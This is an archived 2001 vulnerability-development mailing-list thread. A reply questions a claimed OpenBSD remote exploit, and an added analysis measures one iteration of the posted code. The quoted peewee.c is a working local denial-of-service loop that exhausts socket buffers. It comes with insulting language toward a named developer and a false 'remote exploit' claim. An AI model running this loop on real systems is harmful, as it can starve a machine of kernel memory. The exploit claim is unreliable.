Vulnerability Development mailing list archives

Re: proof of exploited code


From: Blue Boar <BlueBoar () thievco com>
Date: Wed, 06 Jun 2001 08:38:55 -0700

I let this through so that it might be refuted.

Now, I'm no expert on the socket calls... but it seems
to me that if this were a remote exploit, there
would have to be a destination IP address..or port
number.. or, you know, some sort of shellcode or
something.

So what is it then, a fork bomb for the machine that runs it?

                                Ryan

Fsck Theo Dumbraadt wrote:

This code shows a remote exploit for OpenBSD versions 2.8 and 2.9
and can now be released to the public to break Theo's 4 years without
remote exploits sayings. I wrote it while people told me it could not
happen on the list so here is your proofs bitch.

//
// peewee.c
// peewee herman proof of concept this code will show all of the
// world how vulnerable OpenBSD is and how Theo Dumbraadt is
// not more than a liar copyraadt 2001 by Jigglypuff
// http://home.online.no/~wiighome/ninasiden/Jigglypuff.jpg
// this proggie is GPL licensed to those who use it keep my
// credits and not be a lamer
//
#include        <unistd.h>
#include        <sys/socket.h>
#include        <fcntl.h>

#define         BUFFERSIZE      409600

extern  int
main(void)
{
        int             p[2], i;
        char            crap[BUFFERSIZE];

        while (1)
        {
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                        break;
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);
                write(p[0], crap, BUFFERSIZE);
                write(p[1], crap, BUFFERSIZE);
        }
        return(0);
}

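The following is an added example, not code from either poster or from the OpenBSD project. It runs a single iteration of what the posted loop does, then releases it, to show the points raised in the reply: the sockets are AF_UNIX (local to the machine, with no destination address or port), one non-blocking write leaves data queued in kernel socket buffers, and the loop ends when socketpair() fails, which the per-process descriptor limit bounds. The names pair_probe, probe_pair and fd_soft_limit are made up for this illustration.

```c
/* Added example: measure ONE iteration of the posted loop, then clean up. */
#include <fcntl.h>
#include <stdio.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <unistd.h>
#define BUFFERSIZE 409600       /* same request size as the posted code */

struct pair_probe {
    int  family;    /* address family reported by getsockname() */
    int  granted;   /* SO_SNDBUF as reported back by the kernel */
    long queued;    /* bytes one non-blocking write() managed to queue */
};

/* Create one pair, measure it, and release it. Returns 0 on success. */
int probe_pair(struct pair_probe *out)
{
    static char zeros[BUFFERSIZE];      /* zero-filled, not stack garbage */
    struct sockaddr_storage ss = {0};
    socklen_t sslen = sizeof ss, optlen = sizeof out->granted;
    int p[2], want = BUFFERSIZE, rc = -1;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
        return -1;
    /* The kernel may clamp or refuse the request, so read back the result. */
    (void)setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &want, sizeof want);
    if (getsockname(p[0], (struct sockaddr *)&ss, &sslen) == 0 &&
        getsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &out->granted, &optlen) == 0 &&
        fcntl(p[0], F_SETFL, O_NONBLOCK) == 0) {
        out->family = ss.ss_family;
        out->queued = (long)write(p[0], zeros, sizeof zeros);
        rc = 0;
    }
    close(p[0]);    /* closing both ends frees the queued data */
    close(p[1]);
    return rc;
}

/* Soft RLIMIT_NOFILE: each pair costs two descriptors, so this caps the loop. */
long fd_soft_limit(void)
{
    struct rlimit rl;
    return getrlimit(RLIMIT_NOFILE, &rl) == 0 ? (long)rl.rlim_cur : -1;
}

int main(void)
{
    struct pair_probe r;
    if (probe_pair(&r) != 0) { perror("probe_pair"); return 1; }
    printf("family=%d (AF_UNIX=%d) granted=%d queued=%ld fd_limit=%ld\n",
           r.family, AF_UNIX, r.granted, r.queued, fd_soft_limit());
    return 0;
}
```

Multiplying the queued figure by two writes per pair and by half the descriptor limit gives an upper bound on the socket-buffer memory a single unprivileged process can hold before the loop exits.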